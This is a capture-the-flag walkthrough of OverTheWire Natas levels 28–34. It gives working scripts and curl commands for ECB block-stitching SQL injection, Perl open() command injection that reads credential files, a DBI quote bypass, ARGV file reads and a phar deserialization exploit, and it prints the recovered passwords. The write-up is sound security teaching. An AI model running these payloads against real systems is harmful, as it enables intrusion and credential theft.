Some automation might help discern a pattern based on the user input query. The (admittedly not particularly elegant) program below submits repeated requests, increasing the size of input each time. The size of the output is tracked and any changes (~) and additions (+) compared to the previous request.

natas28_probe.py

import base64
import requests
import textwrap
from collections import namedtuple
from urllib.parse import unquote


def main():
    url = "http://natas28.natas.labs.overthewire.org"
    session = requests.Session()
    session.auth = ("natas28", "JW..")

    Query = namedtuple("Query", ["user_query", "query"])
    history: list[Query] = []

    for n in range(0, 50):
        user_query = "a" * n
        with session.post(url, params={"query": user_query}) as response:
            _, query = response.url.split("=")
            query = base64.b64decode(unquote(query)).hex()
            history.append(Query(user_query=user_query, query=query))

    for n, q in enumerate(history):
        print(f"input: {q.user_query} ({len(q.user_query)})")
        print(f"query length: {len(q.query)}")
        if n == 0:
            print(textwrap.fill(q.query, 32))
        else:
            query = textwrap.wrap(q.query, 32)
            prev_query = textwrap.wrap(history[n - 1].query, 32)
            for m, q in enumerate(query):
                print(f"{m}: ", end="")
                if m < len(prev_query):
                    if q == prev_query[m]:
                        print(f" {q}")
                    else:
                        print(f"~{q}")  # changed block
                else:
                    print(f"+{q}")  # new block
        print()


if __name__ == "__main__":
    main()

Running natas28_probe.py produces the following output (heavily truncated):

$ python3 natas28_probe.py
input:  (0)
query length: 160
1be82511a7ba5bfd578c0eef466db59c
dc84728fdcf89d93751d10a7c75c8cf2
e87ff60c99ad72ccbd947e3417a90128
a77e8ed1aabe0b5d05c4ffe6ac1423ab
478eb1a1fe261a2c6c15061109b3feda
...
input: aaaaaaaaaa (10)
query length: 160
0:  1be82511a7ba5bfd578c0eef466db59c
1:  dc84728fdcf89d93751d10a7c75c8cf2
2: ~c0872dee8bc90b1156913b08a223a39e
3: ~738a5ffb4a4500246775175ae596bbd6
4: ~f34df339c69edce11f6650bbced62702
...
input: aaaaaaaaaaaaa (13)
query length: 192
0:  1be82511a7ba5bfd578c0eef466db59c
1:  dc84728fdcf89d93751d10a7c75c8cf2
2:  c0872dee8bc90b1156913b08a223a39e
3: ~1f74714d76fcc5d464c6a221e6ed98e4
4: ~6223a14d9c4291b98775b03fbc73d4ed
5: +d8ae51d7da71b2b083d919a0d7b88b98

input: aaaaaaaaaaaaaa (14)
query length: 192
0:  1be82511a7ba5bfd578c0eef466db59c
1:  dc84728fdcf89d93751d10a7c75c8cf2
2:  c0872dee8bc90b1156913b08a223a39e
3: ~ecd36f8fd9164d403540e449707d27e5
4: ~4257a343daadaaf2c0e3a1d71ce03dd1
5: ~7b7baca655f298a321e90e3f7a60d4d8
...
input: aaaaaaaaaaaaaaaaaaaaaaaaaaaaa (29)
query length: 224
0:  1be82511a7ba5bfd578c0eef466db59c
1:  dc84728fdcf89d93751d10a7c75c8cf2
2:  c0872dee8bc90b1156913b08a223a39e
3:  b39038c28df79b65d26151df58f7eaa3
4: ~1f74714d76fcc5d464c6a221e6ed98e4
5: ~6223a14d9c4291b98775b03fbc73d4ed
6: +d8ae51d7da71b2b083d919a0d7b88b98
...
input: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa (42)
query length: 224
0:  1be82511a7ba5bfd578c0eef466db59c
1:  dc84728fdcf89d93751d10a7c75c8cf2
2:  c0872dee8bc90b1156913b08a223a39e
3:  b39038c28df79b65d26151df58f7eaa3
4: ~b39038c28df79b65d26151df58f7eaa3
5: ~738a5ffb4a4500246775175ae596bbd6
6: ~f34df339c69edce11f6650bbced62702
...

Several observations can be made from this output:

the output is deterministic in the sense that the same input always produces the same output
every resulting query (represented as hex) is evenly divisible by 32
every 16 characters the resulting query size increases by 32
- for example 29 - 13 = 16 (and 224 - 192 = 32)
some chunks are static:
- 0, 1 for all requests
- 0, 1, 2 when input size is >=10
- at 42 characters of input chunks 3 and 4 are repeating

All of the above indicates that the query string is produced by a block cipher operating in ECB mode, with block size 16. Any block of identical content will be encrypted with the same key and input, producing the same output. This is visible when two blocks (3, 4) are full of a's at 42 characters of input and produce b39038c28df79b65d26151df58f7eaa3. The ECB theory can be confirmed by sending a query string of incorrect padding which generates a revealing error message:

$ curl -s http://natas28.natas.labs.overthewire.org/search.php?query=asdf \
> -u natas28:$PW | grep block
Incorrect amount of PKCS#7 padding for blocksize

So how can this be used to leak the password for natas29? One theory is that while the application properly escapes input for the SQL query, it might be possible to perform an SQL injection by manipulating the input to produce an encrypted query output which contains an SQL statement of choice. Since each block is processed separately, it should be possible to stitch blocks together or only send some of the blocks.

From the output of natas28_probe.py it is clear that the offset for a clean block is 12: a new block gets created when input reaches 13. At 10 a's, the input to the cipher function looks like this, where ? are unknown characters:

      +---------------------------------------------------------------+
      |                             byte                              |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|block| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10| 11| 12| 13| 14| 15|
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   0 | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   1 | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   2 | ? | ? | ? | ? | ? | ? | a | a | a | a | a | a | a | a | a | a |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   3 | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   4 | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+

It is possible to determine that there is indeed a % directly following the input, by observing that both aaaaaaaaa and aaaaaaaaa% produce 9e622686a52640595706099abcb052bb for block 2. In a similar way, it is possible to determine that an input ' is escaped, as aaaaaaaa and aaaaaaaa%' produce different results.

Continuing to use 10 as of input (of course, any 10 single-byte characters can be used), it is possible to reproduce the first two lines of the query with some guesswork. This confirms both that this is indeed SQL and the structure of the query. Note that blocks 0,1 and 3,4 are identical:

>>> import base64, requests, textwrap
>>> from urllib.parse import unquote
>>> url = "http://natas28.natas.labs.overthewire.org"
>>> auth = ("natas28", "JW..")
>>> input = "aaaaaaaaaaSELECT * from jokes where joke l"
>>> r = requests.post(url, params={"query": input}, auth=auth)
>>> _, query = r.url.split("=")
>>> query = base64.b64decode(unquote(query)).hex()
>>> for n, chunk in enumerate(textwrap.wrap(query, 32)):
...     print(f"{n}: {chunk}")
... 
0: 1be82511a7ba5bfd578c0eef466db59c
1: dc84728fdcf89d93751d10a7c75c8cf2
2: c0872dee8bc90b1156913b08a223a39e
3: 1be82511a7ba5bfd578c0eef466db59c
4: dc84728fdcf89d93751d10a7c75c8cf2
5: 738a5ffb4a4500246775175ae596bbd6
6: f34df339c69edce11f6650bbced62702

When reaching an input of size 13, a new block is created, where P represents padding added to the new block (each block needs to be exactly the same length as the key - in this case 16). The SELECT statement looks something like this:

      +---------------------------------------------------------------+
      |                             byte                              |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|block| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10| 11| 12| 13| 14| 15|
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   0 | S | E | L | E | C | T |   | * |   | f | r | o | m |   | j | o |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   1 | k | e | s |   | w | h | e | r | e |   | j | o | k | e |   | l |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   2 | i | k | e |   | ' | % | a | a | a | a | a | a | a | a | a | a |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   3 | a | a | a | % | ' | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   4 | ? | P | P | P | P | P | P | P | P | P | P | P | P | P | P | P |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+

Based on previous exercises it is probably safe to assume that user data is in a table named users and the password in a password field. Knowing this, one could either inject a UNION statement into the existing query, producing something like this:

SELECT * from jokes where joke like '%...'
union all select password from users -- %...'

... or the much simpler:

SELECT password from users #

Armed with this information, the objective will be to produce the following state:

      +---------------------------------------------------------------+
      |                             byte                              |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|block| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10| 11| 12| 13| 14| 15|
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   0 | S | E | L | E | C | T |   | * |   | f | r | o | m |   | j | o |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   1 | k | e | s |   | w | h | e | r | e |   | j | o | k | e |   | l |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   2 | i | k | e |   | ' | % | a | a | a | a | a | a | a | a | a | a |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   3 | S | E | L | E | C | T |   | p | a | s | s | w | o | r | d |   |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   4 | f | r | o | m |   | u | s | e | r | s |   | # |   | a | a | a |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   5 | a | a | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   6 | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+

The length (10 + n * 16) is chosen to avoid any padding and have "clean" blocks.

The following small program can be used to experiment with creating query strings to send to the application:

natas28.py

import base64
import sys
import requests
from urllib.parse import unquote
from urllib.parse import quote_plus
from sys import argv

URL = "http://natas28.natas.labs.overthewire.org"
AUTH = ("natas28", "JW..")
PAD_CHAR = "a"
BLOCK_SIZE = 16


def create_query(user_query) -> str:
    r = requests.post(URL, auth=AUTH, params={"query": user_query})
    _, query = r.url.split("=")
    query = base64.b64decode(unquote(query))
    query = query[3 * (BLOCK_SIZE) :]  # slice from chunk 3
    return quote_plus(base64.b64encode(query))


def main():
    user_query = 10 * PAD_CHAR + argv[1]
    # ensure input is > 32 and evenly divisible by block size
    while len(user_query) % BLOCK_SIZE != 0 or len(user_query) <= BLOCK_SIZE * 2:
        user_query += PAD_CHAR
    sys.stdout.write(create_query(user_query))


if __name__ == "__main__":
    main()

The output can be used to test queries, for example:

$ curl -s -u natas28:$PW \
> http://natas28.natas.labs.overthewire.org/search.php\
> ?query=$(python3 natas28.py "SELECT * from jokes #")
# ... all jokes

This confirms that the approach is working as expected and the application can be made to execute user-controlled SQL statement. However, running it with the intended query produces an error:

$ curl -s -u natas28:$PW \
> http://natas28.natas.labs.overthewire.org/search.php\
> ?query=$(python3 natas28.py "SELECT password from users #")
# ...
<b>Notice</b>:  Undefined index: joke in <b>/var/www/natas/natas28/search.php</b> on line <b>92</b><br />
# ...

This error is likely a result of the application attempting to access the results from the SQL query by accessing the joke column for each row in the response. The query can be updated to return the password in a column named joke:

$ curl -s -u natas28:$PW \
> http://natas28.natas.labs.overthewire.org/search.php\
> ?query=$(python3 natas28.py "SELECT password as joke from users #") |
> tac | grep -oEm1 "[[:alnum:]]{32}"
airooCaiseiyee8he8xongien9euhe8b

And there we have it.

Conclusion

This level required quite a bit more effort compared to most other levels in the Natas series so far. It does an excellent job of highlighting the shortcomings of using ECB mode for block ciphers. In fact, it is hard to find use cases where ECB is better suited than other modes such as GCM.

Level 29

This level switches to a programming language that is probably equally hated and loved: Perl. There is no source code provided, but on the other hand it might not be readable anyway ¯\(ツ)/¯. Right-clicking is disabled with javascript and the oncontextmenu event.

The application allows the user to select files from a drop-down list, where each file contains one issue of a "Perl Underground" zine. The actual contents of the text does not seem relevant for the level, which is appreciated given the length and questionable quality of the content.

Selecting a page from the drop-down list triggers a GET request with the file name in the file query parameter:

<form action="index.pl" method="GET">
<select name="file" onchange="this.form.submit()">
  <option value="">s3lEcT suMp1n!</option>
  <option value="perl underground">perl underground</option>
  <option value="perl underground 2">perl underground 2</option>
  <option value="perl underground 3">perl underground 3</option>
  <option value="perl underground 4">perl underground 4</option>
  <option value="perl underground 5">perl underground 5</option>
</select>
</form>

Specifying an arbitrary file appears to result in no text output and a file name that contains natas (e.g. /etc/natas_webpass/natas30) outputs a "meeeeeep!" message.

It is probable that the application uses open to read the file. This function comes with a few different signatures and various modes of operation that make it very versatile:

Instead of a filename, you may specify an external command (plus an optional argument list) or a scalar reference, in order to open filehandles on commands or in-memory scalars, respectively.

One of these modes enables running a command instead of reading from a file. This is done using the | character and can be convenient as it provides easy access to shell commands, for example for post-processing of some input. If using the 2-argument version of open, this convenience comes at a significant cost: arbitrary command execution.

A basic test can confirm this theory:

$ curl -s -u natas29:$PW \
> http://natas29.natas.labs.overthewire.org/index.pl?\
> file=\|printf%20hello | tail -2
</html>
hello.txt

Command injection is successful and the output is appended to the response, followed by a .txt that is added to the file name by the application. This can be avoided by terminating the input with a null character (%00). Using this approach to dump the application's source code explains why file names containing natas are rejected:

$ curl -s -u natas29:$PW \
> http://natas29.natas.labs.overthewire.org/index.pl?\
> file=\|cat%20index.pl%00 | sed -n "/if/,/^}/p"
if(param('file')){
    $f=param('file');
    if($f=~/natas/){
        print "meeeeeep!<br>";
    }
    else{
        open(FD, "$f.txt");
        print "<pre>";
        while (<FD>){
            print CGI::escapeHTML($_);
        }
        print "</pre>";
    }
}

The natas filter can easily be bypassed using shell expansions:

$ curl -s -u natas29:$PW \
> http://natas29.natas.labs.overthewire.org/index.pl?\
> file=\|cat%20/etc/n*tas_webpass/n*tas30%00 | tail -1
wie9iexae0Daihohv8vuu3cei9wahf0e

Conclusion

The lesson in this level is that using the 2-argument version of open is subject to a whole range of problems. The correct implementation would be to use the 3-argument open which separates the mode from the file name and explicitly open the file for reading (<):

open(my FD, "<", "$f.txt");

In reading up on issues in Perl in CGI environments, I found the following useful resources:

Level 30

This level introduces the DBI module:

use CGI qw(:standard);
use DBI;
# ...
if ('POST' eq request_method && param('username') && param('password')){
    my $dbh = DBI->connect( "DBI:mysql:natas30","natas30", "<censored>", {'RaiseError' => 1});
    my $query="Select * FROM users where username =".$dbh->quote(param('username')) . " and password =".$dbh->quote(param('password'));

    my $sth = $dbh->prepare($query);
    $sth->execute();
    my $ver = $sth->fetch();
    if ($ver){
        print "win!<br>";
        print "here is your result:<br>";
        print @$ver;
    }
    else{
        print "fail :(";
    }
    $sth->finish();
    $dbh->disconnect();
}

The objective is quite clear: make the database query return the record for natas31. quote is used which appears to prevent the most straightforward types of SQL injection. However, in reading the documentation it becomes clear this is not always the case:

$sql = $dbh->quote($value);
$sql = $dbh->quote($value, $data_type);

If $data_type is supplied, it is used to try to determine the required quoting behavior by using the information returned by "type_info". As a special case, the standard numeric types are optimized to return $value without calling type_info.

With 2 arguments to the function it is possible to avoid quotes being escaped altogether given a numeric $data_type. One such data type is SQL_NUMERIC which is assigned the code 2.

So how to pass 2 arguments to quote? It turns out CGI will evaluate repeated parameters as a list. Here's a breakdown:

By passing password twice in the request:

/?username=natas31&password=%27whatever%27%20or%20true&password=2

... this statement will be executed:

$dbh->quote("'whatever' or true", 2)); # -> "'whatever' or true"

... making the program run this following query:

Select * FROM users where username ="natas31"
and password ='whatever' or true;

... which rather unsurprisingly returns the password:

$ curl -s -u natas30:wie9iexae0Daihohv8vuu3cei9wahf0e \
> -X POST http://natas30.natas.labs.overthewire.org/index.pl \
> -d username=natas31 \
> -d password="'whatever' or true" -d password=2 |
> tac | grep -oEm1 "[[:alnum:]]{32,}"
natas31hay7aecuungiuKaezuathuk9biin0pu1

Conclusion

This is a rather straightforward implementation SQL injection, enabled by the somewhat odd behavior of both the CGI param and DBI quote functions.

The best mitigation to avoid an SQL injection might be to use placeholders, for example:

my $sth = $dbh->prepare(
    "SELECT *
    FROM users
    WHERE username = ?
    AND password = ?"
);
$sth->bind_param(1, $username);
$sth->bind_param(2, $password);
$sth->execute();

This would prevent any issues with quoting the query, regardless of how param and quote are used. Additionally, scalar could be used with param to avoid getting an unexpected list:

my $password = scalar(param('password'));

On a final note, anyone building a CGI application in 2022 might be testing their sanity, so these issues are not very relevant. In fact, CGI has been removed from perl core.

Level 31

More perl madness. This time a file upload form:

my $cgi = CGI->new;
if ($cgi->upload('file')) {
    my $file = $cgi->param('file');
    print '<table class="sortable table table-hover table-striped">';
    $i=0;
    while (<$file>) {
        my @elements=split /,/, $_;

        if($i==0){ # header
            print "<tr>";
            foreach(@elements){
                print "<th>".$cgi->escapeHTML($_)."</th>";   
            }
            print "</tr>";
        }
        else{ # table content
            print "<tr>";
            foreach(@elements){
                print "<td>".$cgi->escapeHTML($_)."</td>";   
            }
            print "</tr>";
        }
        $i+=1;
    }
    print '</table>';
}

This exact issue - backed by an impressive collection of camel imagery - is explained very well in The Perl Jam 2: The Camel Strikes Back. The TL;DR of that presentation is:

there is magic behavior for<ARGV>
upload() checks if one file parameter is an uploaded file
the assignment my $file = $cgi->param('file'); stores the first file parameter into $file

In summary, all that is needed is to:

provide a file to upload in the file parameter
provide another file parameter set to ARGV
and finally a query parameter that gets mapped into ARGV

... adding some curl- and grep-Fu:

$ touch natas31.csv
$ curl -s -u natas31:$PW \
> http://natas31.natas.labs.overthewire.org/index.pl?%2Fetc%2Fnatas_webpass%2Fnatas32 \
> -F 'file=ARGV' -F 'file=@natas31.csv' |
> tac | grep -oEm1 '[[:alnum:]]{32}'
no1vohsheCaiv3ieH4em1ahchisainge

Conclusion

🐪 + 💻 + 🌐 = 🙈

Level 32

32 picks up where 31 left off. The same source code is provided, but a command must be executed to get to the password. As noted in 29, appending | to the file name makes the open()function execute a command.

$ touch natas32.csv
# overworked way of using curl for url-encoding because why not
$ QUERY=$(curl -sG . --data-urlencode "/bin/ls -Al . |" -w "%{url_effective}" |
> cut -d "?" -f2)
$ curl -s -u natas32:$PW \
> http://natas32.natas.labs.overthewire.org/index.pl?${QUERY} \
> -F 'file=ARGV' -F 'file=@natas32.csv' |
> grep -oE ".rw.+$"
-rw-r----- 1 natas32 natas32   119 Dec 15  2016 .htaccess
-rw-r----- 1 natas32 natas32   129 Oct 20  2018 .htpasswd
-rwsrwx--- 1 root    natas32  7168 Dec 15  2016 getpassword
-rwxr-x--- 1 natas32 natas32   235 Dec 15  2016 getpassword.c
-rwxr-x--- 1 natas32 natas32   236 Dec 15  2016 getpassword.c.tmpl
-rwxr-x--- 1 natas32 natas32  9667 Dec 15  2016 index-source.html
-rwxr-x--- 1 natas32 natas32  2952 Dec 15  2016 index-source.pl
-rwxr-x--- 1 natas32 natas32  2991 Dec 15  2016 index.pl
-rwxr-x--- 1 natas32 natas32  2952 Dec 15  2016 index.pl.tmpl
-rwxr-x--- 1 natas32 natas32 97180 Dec 15  2016 jquery-1.12.3.min.js
-rwxr-x--- 1 natas32 natas32 16877 Dec 15  2016 sorttable.js
drwxr-x--- 2 natas32 natas32  4096 Mar  4 01:53 tmp

Running getpasword does exactly what you think it does:

$ QUERY=$(curl -sG . --data-urlencode './getpassword |' -w "%{url_effective}" |
> cut -d "?" -f2)
$ curl -s -u natas32:$PW \
> http://natas32.natas.labs.overthewire.org/index.pl?${QUERY} \
> -F "file=ARGV" -F "file=@natas32.csv" |
> tac | grep -oEm1 "[[:alnum:]]{32}"
shoogeiGa2yee3de6Aex8uaXeech5eey

Conclusion

⚠ 🐪 ⚠

Level 33

33 provides a form to upload a file. For each uploaded file, __construct() and __destruct() magic methods are called. The __destruct() implementation includes a call to passthru() to execute the file:

<?php
    session_start();
    if(array_key_exists("filename", $_POST) and array_key_exists("uploadedfile",$_FILES)) {
        new Executor();
    }
?>
<?php
    class Executor{
        private $filename=""; 
        private $signature='adeafbadbabec0dedabada55ba55d00d';
        private $init=False;

        function __construct(){
            $this->filename=$_POST["filename"];
            if(filesize($_FILES['uploadedfile']['tmp_name']) > 4096) {
                echo "File is too big<br>";
            }
            else {
                if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], "/natas33/upload/" . $this->filename)) {
                    echo "The update has been uploaded to: /natas33/upload/$this->filename<br>";
                    echo "Firmware upgrad initialised.<br>";
            } # ...
        }
    }

        function __destruct(){
            # ...
            if(md5_file($this->filename) == $this->signature){
                echo "Congratulations! Running firmware update: $this->filename <br>";
                passthru("php " . $this->filename);
            } # ...
        }
    }
?>

While it might be possible to craft a file with the required MD5 hash, it is unlikely that this is the intended way to solve the challenge. Usage of magic methods provides a hint that a deserialization attack might be possible, but there is no usage of unserialize -- the approach used for 26 cannot be re-used.

The technique described by Sam Thomas in a black hat presentation seems to be applicable here and may even have inspired the challenge.

The TL;DR of that presentation is:

PHP applications can be packed into a "Phar" (PHP Archive) file
PHP provides a phar:// stream wrapper which enables using such phar files in place of file names for file-related functions
phar archives can include metadata which can be any PHP variable that can be serialized

At this point you might be thinking that the last bullet sounds potentially problematic. And you'd be right!

The phar:// wrapper is constrained such that it operates on local files only. As a result, it cannot be disabled by the allow_url_fopen and allow_url_include INI options. The limited scope of local files might be sufficient to prevent uncontrolled deserialization in some contexts, but for applications that allow uploading files this might no longer apply. Also, the phar archive file format can be quite easily used to create polyglot files, for example a file that is simultaneously a valid phar/JPEG which provides a convenient way to circumvent restrictions on certain file types.

This means it should be possible to:

create a php file with code to be injected in passthru
upload the file
create a phar with metadata containing an instance of the Executor class with a filename property to matching the file uploaded in 1
upload the phar
call the API using phar://phar-file-name
the phar will be unserialized and instantiate the Executor class, which will run code the uploaded in 1
???
profit!

Payload

The following should do:

natas33.php

<?php include("/etc/natas_webpass/natas34"); ?>

Phar

An excellent sample for creating a phar file is available in the PayloadsAllTheThings repo. This should be good enough:

natas33.phar.php

<?php
class Executor{
    private $filename="natas33.php";
    private $signature= True; # md5 comparison always True
  }

$phar = new Phar("natas33.phar");
$phar->startBuffering();
# https://www.php.net/manual/en/phar.fileformat.stub.php
$phar->setStub("<?php __HALT_COMPILER();");
$phar->setMetadata(new Executor());
# at least 1 file is required
$phar["fish.txt"] = "moo";
$phar->stopBuffering();
?>

Running the script produces the archive. The phar.readonly flag is required to modify an archive:

$ php -d phar.readonly=false natas33.phar.php

Exploit

$ curl -s http://natas33.natas.labs.overthewire.org/index.php \
> -u natas33:$PW -o /dev/null \
> -F "uploadedfile=@natas33.php" -F "filename=natas33.php" # known filename
$ curl -s http://natas33.natas.labs.overthewire.org/index.php \
> -u natas33:$PW -o /dev/null \
> -F "uploadedfile=@natas33.phar" -F "filename=natas33.phar"
$ curl -s http://natas33.natas.labs.overthewire.org/index.php \
> -u natas33:$PW \
> -F "uploadedfile=@natas33.phar" -F "filename=phar://natas33.phar/fish.txt" |
> tac | grep -oEm1 "[[:alnum:]]{32}"
shu5ouSu6eicielahhae0mohd4ui5uig

Conclusion

A simple solution to mitigate this issue is simply to filter out any stream wrappers in user-supplied file names. Additionally, this behavior has been fixed in PHP 8.0, such that getMetaData() must be called for deserialization to happen.

Level 34

$ curl -s http://natas34.natas.labs.overthewire.org \
> -u natas34:$PW | sed -n "/<div/,/div>/p"
<div id="content">
Congratulations! You have reached the end... for now.
</div>

Looks like that's it for Natas!

Closing Thoughts

Natas does an excellent job at introducing several web security concepts and. I want to thank the authors at Over the Wire for their efforts in producing this content and making available at no cost for the rest of us to enjoy!

As a secondary objective, I decided not to rely on any external web exploit software but do as much as possible from the command line and exercise my shell muscle memory a bit. In that process I learned many new (to me) curl and regex options and discovered the tac utility, which was really useful when greping for passwords.

With all levels completed, I plan to revisit my solutions and do some clean-up of explanations and code snippets, possibly also identifying alternate solutions.